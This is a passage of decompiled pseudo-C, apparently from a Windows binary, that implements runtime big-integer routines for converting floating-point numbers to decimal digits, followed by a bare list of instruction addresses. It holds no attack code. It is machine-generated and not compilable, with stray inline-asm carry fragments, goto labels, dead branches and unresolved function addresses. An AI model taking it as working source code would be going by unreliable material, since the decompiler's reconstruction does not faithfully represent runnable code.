													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t825 - 1;
													if(_t825 != 1) {
														_t1065 = _v472;
														__eflags = _t1065;
														if(_t1065 != 0) {
															_t1177 = 0;
															_t1235 = 0;
															__eflags = 0;
															do {
																_t1127 = _t825 *  *(_t1258 + _t1235 * 4 - 0x1d0) >> 0x20;
																 *(_t1258 + _t1235 * 4 - 0x1d0) = _t825 *  *(_t1258 + _t1235 * 4 - 0x1d0) + _t1177;
																_t825 = _v1896;
																asm("adc edx, 0x0");
																_t1235 = _t1235 + 1;
																_t1177 = _t1127;
																__eflags = _t1235 - _t1065;
															} while (_t1235 != _t1065);
															_t1178 = _t1177;
															__eflags = _t1178;
															if(_t1178 != 0) {
																_t831 = _v472;
																__eflags = _t831 - 0x73;
																if(_t831 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1258 + _t831 * 4 - 0x1d0) = _t1178;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t786 - 0x26;
												if(_t786 > 0x26) {
													_t786 = 0x26;
												}
												_t1066 =  *(0xa4575e + _t786 * 4) & 0x000000ff;
												_v1872 = _t786;
												_v1400 = ( *(0xa4575e + _t786 * 4) & 0x000000ff) + ( *(0xa4575f + _t786 * 4) & 0x000000ff);
												E00A31E90(_t1066 << 2,  &_v1396, 0, _t1066 << 2);
												_t842 = E00A3F320( &(( &_v1396)[_t1066]), 0xa44e58 + ( *(0xa4575c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xa4575f + _t786 * 4) & 0x000000ff) << 2);
												_t1067 = _v1400;
												_t1264 =  &(_t1264[6]);
												_v1892 = _t1067;
												__eflags = _t1067 - 1;
												if(_t1067 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1067 - _v472;
														_t1181 =  &_v1396;
														_t843 = _t842 & 0xffffff00 | _t1067 - _v472 > 0x00000000;
														__eflags = _t843;
														if(_t843 != 0) {
															_t1128 =  &_v468;
														} else {
															_t1181 =  &_v468;
															_t1128 =  &_v1396;
														}
														_v1908 = _t1128;
														__eflags = _t843;
														if(_t843 == 0) {
															_t1067 = _v472;
														}
														_v1876 = _t1067;
														__eflags = _t843;
														if(_t843 != 0) {
															_v1892 = _v472;
														}
														_t1129 = 0;
														_t1237 = 0;
														_v1864 = 0;
														__eflags = _t1067;
														if(_t1067 == 0) {
															L243:
															_t844 = _t1129;
															_v472 = _t1129;
															_t845 = _t844 << 2;
															__eflags = _t845;
															_push(_t845);
															_t846 =  &_v1860;
															goto L244;
														} else {
															_t1182 = _t1181 -  &_v1860;
															__eflags = _t1182;
															_v1928 = _t1182;
															do {
																_t852 =  *(_t1258 + _t1182 + _t1237 * 4 - 0x740);
																_v1896 = _t852;
																__eflags = _t852;
																if(_t852 != 0) {
																	_t853 = 0;
																	_t1183 = 0;
																	_t1068 = _t1237;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1068 - 0x73;
																		if(_t1068 == 0x73) {
																			goto L258;
																		} else {
																			_t1182 = _v1928;
																			_t1067 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1068 - 0x73;
																			if(_t1068 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1068 - _t1129;
																			if(_t1068 == _t1129) {
																				 *(_t1258 + _t1068 * 4 - 0x740) =  *(_t1258 + _t1068 * 4 - 0x740) & 0x00000000;
																				_t864 = _t853 + 1 + _t1237;
																				__eflags = _t864;
																				_v1864 = _t864;
																				_t853 = _v1888;
																			}
																			_t859 =  *(_v1908 + _t853 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1258 + _t1068 * 4 - 0x740) =  *(_t1258 + _t1068 * 4 - 0x740) + _t859 * _v1896 + _t1183;
																			asm("adc edx, 0x0");
																			_t853 = _v1888 + 1;
																			_t1068 = _t1068 + 1;
																			_v1888 = _t853;
																			_t1183 = _t859 * _v1896 >> 0x20;
																			_t1129 = _v1864;
																			__eflags = _t853 - _v1892;
																			if(_t853 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1183;
																				if(_t1183 == 0) {
																					goto L240;
																				}
																				__eflags = _t1068 - 0x73;
																				if(_t1068 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1068 - _t1129;
																					if(_t1068 == _t1129) {
																						_t558 = _t1258 + _t1068 * 4 - 0x740;
																						 *_t558 =  *(_t1258 + _t1068 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_v1864 = _t1068 + 1;
																					}
																					_t857 = _t1183;
																					_t1183 = 0;
																					 *(_t1258 + _t1068 * 4 - 0x740) =  *(_t1258 + _t1068 * 4 - 0x740) + _t857;
																					_t1129 = _v1864;
																					asm("adc edi, edi");
																					_t1068 = _t1068 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1237 - _t1129;
																	if(_t1237 == _t1129) {
																		 *(_t1258 + _t1237 * 4 - 0x740) =  *(_t1258 + _t1237 * 4 - 0x740) & _t852;
																		_t1129 = _t1237 + 1;
																		_v1864 = _t1129;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1237 = _t1237 + 1;
																__eflags = _t1237 - _t1067;
															} while (_t1237 != _t1067);
															goto L243;
														}
													} else {
														_t1184 = _v468;
														_push(_t1067 << 2);
														_v472 = _t1067;
														_push( &_v1396);
														_push(_t1032);
														_push( &_v468);
														L313();
														_t1264 =  &(_t1264[4]);
														__eflags = _t1184;
														if(_t1184 == 0) {
															goto L203;
														} else {
															__eflags = _t1184 - 1;
															if(_t1184 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_v1896 = _v472;
																	_t1238 = 0;
																	__eflags = 0;
																	do {
																		_t872 = _t1184;
																		_t1130 = _t872 *  *(_t1258 + _t1238 * 4 - 0x1d0) >> 0x20;
																		 *(_t1258 + _t1238 * 4 - 0x1d0) = _t872 *  *(_t1258 + _t1238 * 4 - 0x1d0);
																		asm("adc edx, 0x0");
																		_t1238 = _t1238 + 1;
																		_t1070 = _t1130;
																		__eflags = _t1238 - _v1896;
																	} while (_t1238 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1185 = _v1396;
													__eflags = _t1185;
													if(_t1185 != 0) {
														__eflags = _t1185 - 1;
														if(_t1185 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1072 = 0;
																_v1896 = _v472;
																_t1239 = 0;
																__eflags = 0;
																do {
																	_t877 = _t1185;
																	_t1131 = _t877 *  *(_t1258 + _t1239 * 4 - 0x1d0) >> 0x20;
																	 *(_t1258 + _t1239 * 4 - 0x1d0) = _t877 *  *(_t1258 + _t1239 * 4 - 0x1d0) + _t1072;
																	asm("adc edx, 0x0");
																	_t1239 = _t1239 + 1;
																	_t1072 = _t1131;
																	__eflags = _t1239 - _v1896;
																} while (_t1239 != _v1896);
																L208:
																_t1071 = _t1070;
																__eflags = _t1071;
																if(_t1071 == 0) {
																	goto L245;
																} else {
																	_t875 = _v472;
																	__eflags = _t875 - 0x73;
																	if(_t875 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1032);
																		_push( &_v468);
																		L313();
																		_t1264 =  &(_t1264[4]);
																		_t848 = 0;
																	} else {
																		 *(_t1258 + _t875 * 4 - 0x1d0) = _t1071;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t846 =  &_v2404;
														L244:
														_push(_t846);
														_push(_t1032);
														_push( &_v468);
														L313();
														_t1264 =  &(_t1264[4]);
														L245:
														_t848 = 1;
													}
												}
												L246:
												__eflags = _t848;
												if(_t848 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t828 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t786 = _v1880 - _v1872;
												__eflags = _t786;
												_v1880 = _t786;
											} while (_t786 != 0);
											_t1051 = _v1884;
											goto L249;
										}
									} else {
										_t880 = _t784 / _t1050;
										_v1908 = _t880;
										_t1073 = _t784 % _t1050;
										_v1896 = _t1073;
										_t881 = _t880;
										__eflags = _t881;
										if(_t881 == 0) {
											L184:
											__eflags = _t1073;
											if(_t1073 != 0) {
												_t1187 =  *(0xa457f4 + _t1073 * 4);
												__eflags = _t1187;
												if(_t1187 != 0) {
													__eflags = _t1187 - 1;
													if(_t1187 != 1) {
														_t882 = _v936;
														_v1896 = _t882;
														__eflags = _t882;
														if(_t882 != 0) {
															_t1074 = 0;
															__eflags = 0;
															do {
																_t883 = _t1187;
																_t1135 = _t883 *  *(_t1258 + _t1074 * 4 - 0x3a0) >> 0x20;
																 *(_t1258 + _t1074 * 4 - 0x3a0) = _t883 *  *(_t1258 + _t1074 * 4 - 0x3a0);
																asm("adc edx, 0x0");
																_t1074 = _t1074 + 1;
																_push(_t1135);
																__eflags = _t1074 - _v1896;
															} while (_t1074 != _v1896);
															__eflags = 0;
															if(0 != 0) {
																_t886 = _v936;
																__eflags = _t886 - 0x73;
																if(_t886 >= 0x73) {
																	goto L186;
																} else {
																	 *((intOrPtr*)(_t1258 + _t886 * 4 - 0x3a0)) = 0;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t881 - 0x26;
												if(_t881 > 0x26) {
													_t881 = 0x26;
												}
												_t1075 =  *(0xa4575e + _t881 * 4) & 0x000000ff;
												_t1188 = _t1075;
												_v1888 = _t881;
												_v1400 = _t1075 + ( *(0xa4575f + _t881 * 4) & 0x000000ff);
												E00A31E90(_t1188 << 2,  &_v1396, 0, _t1188 << 2);
												_t899 = E00A3F320( &(( &_v1396)[_t1188]), 0xa44e58 + ( *(0xa4575c + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xa4575f + _t881 * 4) & 0x000000ff) << 2);
												_t1076 = _v1400;
												_t1264 =  &(_t1264[6]);
												_v1892 = _t1076;
												__eflags = _t1076 - 1;
												if(_t1076 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1076 - _v936;
														_t1190 =  &_v1396;
														_t900 = _t899 & 0xffffff00 | _t1076 - _v936 > 0x00000000;
														__eflags = _t900;
														if(_t900 != 0) {
															_t1136 =  &_v932;
														} else {
															_t1190 =  &_v932;
															_t1136 =  &_v1396;
														}
														_v1876 = _t1136;
														__eflags = _t900;
														if(_t900 == 0) {
															_t1076 = _v936;
														}
														_v1880 = _t1076;
														__eflags = _t900;
														if(_t900 != 0) {
															_v1892 = _v936;
														}
														_t1137 = 0;
														_t1243 = 0;
														_v1864 = 0;
														_t1077 = _t1076;
														__eflags = _t1077;
														if(_t1077 == 0) {
															L177:
															_t901 = _t1137;
															_v936 = _t1137;
															_t902 = _t901 << 2;
															__eflags = _t902;
															goto L178;
														} else {
															_t1191 = _t1190 -  &_v1860;
															__eflags = _t1191;
															_v1928 = _t1191;
															do {
																_t909 =  *(_t1258 + _t1191 + _t1243 * 4 - 0x740);
																_v1884 = _t909;
																_t910 = _t909;
																__eflags = _t910;
																if(_t910 != 0) {
																	_t911 = 0;
																	_t1192 = 0;
																	_t1078 = _t1243;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1078 - 0x73;
																		if(_t1078 == 0x73) {
																			goto L187;
																		} else {
																			_t1191 = _v1928;
																			_t1077 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1078 - 0x73;
																			if(_t1078 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1078 - _t1137;
																			if(_t1078 == _t1137) {
																				 *(_t1258 + _t1078 * 4 - 0x740) =  *(_t1258 + _t1078 * 4 - 0x740) & 0x00000000;
																				_t922 = _t911 + 1 + _t1243;
																				__eflags = _t922;
																				_v1864 = _t922;
																				_t911 = _v1872;
																			}
																			_t917 =  *(_v1876 + _t911 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1258 + _t1078 * 4 - 0x740) =  *(_t1258 + _t1078 * 4 - 0x740) + _t917 * _v1884 + _t1192;
																			asm("adc edx, 0x0");
																			_t911 = _v1872 + 1;
																			_t1078 = _t1078 + 1;
																			_v1872 = _t911;
																			_t1192 = _t917 * _v1884 >> 0x20;
																			_t1137 = _v1864;
																			__eflags = _t911 - _v1892;
																			if(_t911 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				_t1193 = _t1192;
																				__eflags = _t1193;
																				if(_t1193 == 0) {
																					goto L174;
																				}
																				__eflags = _t1078 - 0x73;
																				if(_t1078 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t913 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1078 - _t1137;
																					if(_t1078 == _t1137) {
																						_t370 = _t1258 + _t1078 * 4 - 0x740;
																						 *_t370 =  *(_t1258 + _t1078 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1078 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t915 = _t1193;
																					_t1192 = 0;
																					 *(_t1258 + _t1078 * 4 - 0x740) =  *(_t1258 + _t1078 * 4 - 0x740) + _t915;
																					_t1137 = _v1864;
																					asm("adc edi, edi");
																					_t1078 = _t1078 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1243 - _t1137;
																	if(_t1243 == _t1137) {
																		 *(_t1258 + _t1243 * 4 - 0x740) =  *(_t1258 + _t1243 * 4 - 0x740) & _t910;
																		_t338 = _t1243 + 1; // 0x1
																		_t1137 = _t338;
																		_v1864 = _t1137;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1243 = _t1243 + 1;
																__eflags = _t1243 - _t1077;
															} while (_t1243 != _t1077);
															goto L177;
														}
													} else {
														_t924 = _t1076;
														_push(_t924 << 2);
														_v936 = _t1076;
														_push( &_v1396);
														_push(_t1032);
														_push( &_v932);
														L313();
														_t1264 =  &(_t1264[4]);
														_t1195 = _v932;
														__eflags = _t1195;
														if(_t1195 != 0) {
															__eflags = _t1195 - 1;
															if(_t1195 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1079 = 0;
																	_v1884 = _v936;
																	_t1244 = 0;
																	__eflags = 0;
																	do {
																		_t929 = _t1195;
																		_t1138 = _t929 *  *(_t1258 + _t1244 * 4 - 0x3a0) >> 0x20;
																		 *(_t1258 + _t1244 * 4 - 0x3a0) = _t929 *  *(_t1258 + _t1244 * 4 - 0x3a0) + _t1079;
																		asm("adc edx, 0x0");
																		_t1244 = _t1244 + 1;
																		_t1079 = _t1138;
																		__eflags = _t1244 - _v1884;
																	} while (_t1244 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t903 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1196 = _v1396;
													__eflags = _t1196;
													if(_t1196 != 0) {
														__eflags = _t1196 - 1;
														if(_t1196 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1081 = 0;
																_v1884 = _v936;
																_t1245 = 0;
																__eflags = 0;
																do {
																	_t936 = _t1196;
																	_t1139 = _t936 *  *(_t1258 + _t1245 * 4 - 0x3a0) >> 0x20;
																	 *(_t1258 + _t1245 * 4 - 0x3a0) = _t936 *  *(_t1258 + _t1245 * 4 - 0x3a0) + _t1081;
																	asm("adc edx, 0x0");
																	_t1245 = _t1245 + 1;
																	_t1081 = _t1139;
																	__eflags = _t1245 - _v1884;
																} while (_t1245 != _v1884);
																L149:
																_t1080 = _t1079;
																__eflags = _t1080;
																if(_t1080 == 0) {
																	goto L180;
																} else {
																	_t932 = _v936;
																	__eflags = _t932 - 0x73;
																	if(_t932 < 0x73) {
																		 *(_t1258 + _t932 * 4 - 0x3a0) = _t1080;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t913 =  &_v1396;
																		L188:
																		_push(_t913);
																		_push(_t1032);
																		_push( &_v932);
																		L313();
																		_t1264 =  &(_t1264[4]);
																		_t905 = 0;
																	}
																}
															}
														}
													} else {
														_t902 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t902);
														_t903 =  &_v1860;
														L179:
														_push(_t903);
														_push(_t1032);
														_push( &_v932);
														L313();
														_t1264 =  &(_t1264[4]);
														L180:
														_t905 = 1;
													}
												}
												L181:
												__eflags = _t905;
												if(_t905 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t828 =  &_v932;
													L262:
													_push(_t1032);
													_push(_t828);
													L313();
													_t1264 =  &(_t1264[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t881 = _v1908 - _v1888;
												__eflags = _t881;
												_v1908 = _t881;
											} while (_t881 != 0);
											_t1073 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1170 = _v1920;
									_t1229 = _t1170;
									_v1872 = _t1229;
									_t1054 = _v472;
									__eflags = _t1054;
									if(_t1054 != 0) {
										_t1233 = 0;
										_t1176 = 0;
										__eflags = 0;
										do {
											_t818 =  *(_t1258 + _t1176 * 4 - 0x1d0);
											_t1125 = 0xa;
											_t1126 = _t818 * _t1125 >> 0x20;
											 *(_t1258 + _t1176 * 4 - 0x1d0) = _t818 * _t1125 + _t1233;
											asm("adc edx, 0x0");
											_t1176 = _t1176 + 1;
											_t1233 = _t1126;
											__eflags = _t1176 - _t1054;
										} while (_t1176 != _t1054);
										_v1896 = _t1233;
										__eflags = _t1233;
										_t1229 = _v1872;
										if(_t1233 != 0) {
											_t1063 = _v472;
											__eflags = _t1063 - 0x73;
											if(_t1063 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(_t1032);
												_push( &_v468);
												L313();
												_t1264 =  &(_t1264[4]);
											} else {
												_t824 = _t1126;
												 *((intOrPtr*)(_t1258 + _t1063 * 4 - 0x1d0)) = _t824;
												_v472 = _v472 + 1;
											}
										}
										_t1170 = _t1229;
									}
									_t789 = E00A3A940( &_v472,  &_v936);
									_t1118 = 0xa;
									__eflags = _t789 - _t1118;
									if(_t789 != _t1118) {
										_t790 = _t789;
										__eflags = _t790;
										if(_t790 != 0) {
											_t791 = _t790 + 0x30;
											__eflags = _t791;
											_t1229 = _t1170 + 1;
											 *_t1170 = _t791;
											_v1872 = _t1229;
											goto L282;
										} else {
											_t792 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1229 = _t1170 + 1;
										_t810 = _v936;
										 *_t1170 = 0x31;
										_v1872 = _t1229;
										__eflags = _t810;
										if(_t810 != 0) {
											_t1232 = _t810;
											_t1062 = 0;
											__eflags = 0;
											do {
												_t811 =  *(_t1258 + _t1062 * 4 - 0x3a0);
												_push(0xa);
												 *(_t1258 + _t1062 * 4 - 0x3a0) = _t811 * _t1118;
												asm("adc edx, 0x0");
												_t1062 = _t1062 + 1;
												_push(_t811 * _t1118 >> 0x20);
												_pop(_t1118);
												__eflags = _t1062 - _t1232;
											} while (_t1062 != _t1232);
											_t1229 = _v1872;
											__eflags = 0;
											if(0 != 0) {
												_t814 = _v936;
												__eflags = _t814 - 0x73;
												if(_t814 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(_t1032);
													_push( &_v932);
													L313();
													_t1264 =  &(_t1264[4]);
												} else {
													 *((intOrPtr*)(_t1258 + _t814 * 4 - 0x3a0)) = 0;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t792 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t792;
									_t1038 = _v1916;
									_t793 = _t792;
									__eflags = _t793;
									if(_t793 >= 0) {
										__eflags = _t1038 - 0x7fffffff;
										if(_t1038 <= 0x7fffffff) {
											_t1038 = _t1038 + _t793;
											__eflags = _t1038;
										}
									}
									_t795 = _a24 - 1;
									__eflags = _t795 - _t1038;
									if(_t795 >= _t1038) {
										_t795 = _t1038;
									}
									_t796 = _t795 + _v1920;
									_v1916 = _t796;
									__eflags = _t1229 - _t796;
									if(__eflags != 0) {
										while(1) {
											_t798 = _v472;
											__eflags = _t798;
											if(__eflags == 0) {
												goto L303;
											}
											_t1171 = 0;
											_t1230 = _t798;
											_t1058 = 0;
											__eflags = 0;
											do {
												_t799 =  *(_t1258 + _t1058 * 4 - 0x1d0);
												 *(_t1258 + _t1058 * 4 - 0x1d0) = _t799 * 0x3b9aca00 + _t1171;
												asm("adc edx, 0x0");
												_t1058 = _t1058 + 1;
												_t1171 = _t799 * 0x3b9aca00 >> 0x20;
												__eflags = _t1058 - _t1230;
											} while (_t1058 != _t1230);
											_t1231 = _v1872;
											_t1172 = _t1171;
											__eflags = _t1172;
											if(_t1172 != 0) {
												_t805 = _v472;
												__eflags = _t805 - 0x73;
												if(_t805 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(_t1032);
													_push( &_v468);
													L313();
													_t1264 =  &(_t1264[4]);
												} else {
													 *(_t1258 + _t805 * 4 - 0x1d0) = _t1172;
													_v472 = _v472 + 1;
												}
											}
											_t804 = E00A3A940( &_v472,  &_v936);
											_t1173 = 8;
											_t1038 = _v1916 - _t1231;
											__eflags = _t1038;
											do {
												_t708 = _t804 % _v1912;
												_t804 = _t804 / _v1912;
												_t1123 = _t708 + 0x30;
												__eflags = _t1038 - _t1173;
												if(_t1038 >= _t1173) {
													 *((char*)(_t1173 + _t1231)) = _t1123;
												}
												_t1173 = _t1173 - 1;
												__eflags = _t1173 - 0xffffffff;
											} while (_t1173 != 0xffffffff);
											__eflags = _t1038 - 9;
											if(_t1038 > 9) {
												_t1038 = 9;
											}
											_t1229 = _t1231 + _t1038;
											_v1872 = _t1229;
											__eflags = _t1229 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1229 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1114 = _t1217;
					_t1038 = _t1114 & 0x000fffff;
					if((_t1160 | _t1114 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xa4581c);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1023);
						if(E00A34D29() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A352F8();
							asm("int3");
							_push(_t1258);
							_push(_t1217);
							_t1218 = _v2424;
							__eflags = _t1218;
							if(_t1218 != 0) {
								_t742 = _v0;
								__eflags = _t742;
								if(_t742 != 0) {
									_push(_t1160);
									_t1161 = _a8;
									__eflags = _t1161;
									if(_t1161 == 0) {
										L320:
										E00A31E90(_t1161, _t742, 0, _a4);
										__eflags = _t1161;
										if(_t1161 != 0) {
											__eflags = _a4 - _t1218;
											if(_a4 >= _t1218) {
												_t744 = 0x16;
											} else {
												_t745 = E00A353A4();
												_push(0x22);
												goto L324;
											}
										} else {
											_t745 = E00A353A4();
											_push(0x16);
											L324:
											_pop(_t1220);
											 *_t745 = _t1220;
											E00A352E8();
											_t744 = _t1220;
										}
									} else {
										__eflags = _a4 - _t1218;
										if(_a4 < _t1218) {
											goto L320;
										} else {
											E00A3F320(_t742, _t1161, _t1218);
											_t744 = 0;
										}
									}
								} else {
									_t748 = E00A353A4();
									_t1221 = 0x16;
									 *_t748 = _t1221;
									E00A352E8();
									_t744 = _t1221;
								}
							} else {
								_t744 = 0;
							}
							return _t744;
						} else {
							L309:
							_t1271 = _v1936;
							if(_v1936 != 0) {
								_push( &_v1944);
								E00A3CEBF(_t1038, _t1271);
							}
							return E00A31B61(_v8 ^ _t1258);
						}
					}
				}
			}

0x00a3adf9
0x00a3ae00
0x00a3ae04
0x00a3ae0f
0x00a3ae12
0x00a3ae18
0x00a3ae1e
0x00a3ae23
0x00a3ae29
0x00a3ae32
0x00a3ae34
0x00a3ae36
0x00a3ae36
0x00a3ae3d
0x00a3ae47
0x00a3ae4c
0x00a3ae4f
0x00a3ae73
0x00a3ae77
0x00a3ae7c
0x00a3ae7d
0x00a3ae7f
0x00a3ae81
0x00a3ae87
0x00a3ae87
0x00a3ae8e
0x00a3ae8e
0x00a3ae91
0x00a3c141
0x00000000
0x00a3ae97
0x00a3ae97
0x00a3ae97
0x00a3ae9a
0x00a3c13a
0x00000000
0x00a3aea0
0x00a3aea0
0x00a3aea0
0x00a3aea3
0x00a3c133
0x00000000
0x00a3aea9
0x00a3aea9
0x00a3aeac
0x00a3c12c
0x00000000
0x00a3aeb2
0x00a3aebb
0x00a3aec3
0x00a3aec6
0x00a3aec9
0x00a3aecc
0x00a3aed2
0x00a3aeda
0x00a3aee0
0x00a3aee4
0x00a3aeea
0x00a3aeea
0x00a3aeed
0x00a3aef5
0x00a3aefc
0x00a3aefc
0x00a3aeef
0x00a3aeef
0x00a3aef1
0x00a3af04
0x00a3af0a
0x00a3af0c
0x00a3af10
0x00a3af15
0x00a3af22
0x00a3af24
0x00a3af2a
0x00a3af2f
0x00a3af30
0x00a3af31
0x00a3af3b
0x00a3af40
0x00a3af46
0x00a3af4b
0x00a3af54
0x00a3af54
0x00a3af56
0x00a3af4d
0x00a3af4d
0x00a3af52
0x00000000
0x00000000
0x00a3af52
0x00a3af5c
0x00a3af64
0x00a3af66
0x00a3af6f
0x00a3af70
0x00a3af76
0x00a3af78
0x00a3b36b
0x00a3b371
0x00a3b490
0x00a3b490
0x00a3b497
0x00a3b497
0x00a3b497
0x00a3b49e
0x00a3b4a1
0x00a3b4a8
0x00a3b4a8
0x00a3b4a3
0x00a3b4a3
0x00a3b4a3
0x00a3b4ac
0x00a3b4ad
0x00a3b4af
0x00a3b4b2
0x00a3b4b5
0x00a3b4b8
0x00a3b4be
0x00a3b4c1
0x00a3b4c4
0x00a3b4ce
0x00a3b4ce
0x00a3b4ce
0x00a3b4c6
0x00a3b4c6
0x00a3b4c8
0x00000000
0x00a3b4ca
0x00a3b4ca
0x00a3b4ca
0x00a3b4c8
0x00a3b4d0
0x00a3b4d2
0x00a3b573
0x00a3b573
0x00a3b580
0x00a3b580
0x00a3b580
0x00a3b587
0x00a3b589
0x00a3b590
0x00a3b595
0x00a3b596
0x00a3b59b
0x00a3b4d8
0x00a3b4d8
0x00a3b4da
0x00000000
0x00a3b4e0
0x00a3b4e2
0x00a3b4e3
0x00a3b4e5
0x00a3b4e7
0x00a3b4e7
0x00a3b4e9
0x00a3b4ec
0x00a3b4f4
0x00a3b4f6
0x00a3b4f9
0x00a3b4ff
0x00a3b4ff
0x00a3b501
0x00a3b50d
0x00a3b50d
0x00a3b50d
0x00a3b503
0x00a3b505
0x00a3b505
0x00a3b514
0x00a3b517
0x00a3b519
0x00a3b520
0x00a3b520
0x00a3b51b
0x00a3b51b
0x00a3b51b
0x00a3b528
0x00a3b532
0x00a3b538
0x00a3b539
0x00a3b53e
0x00a3b544
0x00a3b547
0x00000000
0x00000000
0x00a3b549
0x00a3b549
0x00a3b551
0x00a3b551
0x00a3b557
0x00a3b55e
0x00a3b56b
0x00a3b560
0x00a3b560
0x00a3b563
0x00a3b563
0x00a3b55e
0x00a3b4da
0x00a3b5a7
0x00a3b5a9
0x00a3b5aa
0x00a3b5ab
0x00a3b5b0
0x00a3b5b7
0x00a3b5c3
0x00a3b5c4
0x00a3b5c6
0x00a3b5cd
0x00a3b377
0x00a3b377
0x00a3b380
0x00a3b381
0x00a3b38b
0x00a3b391
0x00a3b393
0x00a3b399
0x00a3b399
0x00a3b39b
0x00a3b39b
0x00a3b3a2
0x00a3b3a9
0x00000000
0x00000000
0x00a3b3af
0x00a3b3b2
0x00a3b3b5
0x00000000
0x00a3b3b7
0x00a3b3b7
0x00a3b3b7
0x00a3b3b7
0x00a3b3be
0x00a3b3c1
0x00a3b3c8
0x00a3b3c8
0x00a3b3c3
0x00a3b3c3
0x00a3b3c3
0x00a3b3cc
0x00a3b3d0
0x00a3b3d1
0x00a3b3d3
0x00a3b3d9
0x00a3b3e0
0x00a3b3e1
0x00a3b3e1
0x00a3b3e1
0x00a3b3e8
0x00a3b3e8
0x00a3b3ea
0x00a3b3f6
0x00a3b3f6
0x00a3b3f6
0x00a3b3ec
0x00a3b3ee
0x00a3b3ee
0x00a3b3fd
0x00a3b400
0x00a3b402
0x00a3b409
0x00a3b409
0x00a3b404
0x00a3b404
0x00a3b404
0x00a3b411
0x00a3b41c
0x00a3b422
0x00a3b423
0x00a3b428
0x00a3b42e
0x00a3b431
0x00000000
0x00000000
0x00a3b433
0x00a3b433
0x00a3b43d
0x00a3b448
0x00a3b450
0x00a3b456
0x00a3b460
0x00a3b461
0x00a3b467
0x00a3b46e
0x00a3b481
0x00a3b488
0x00a3b488
0x00000000
0x00a3b3b5
0x00a3b39b
0x00000000
0x00a3b393
0x00a3b5d0
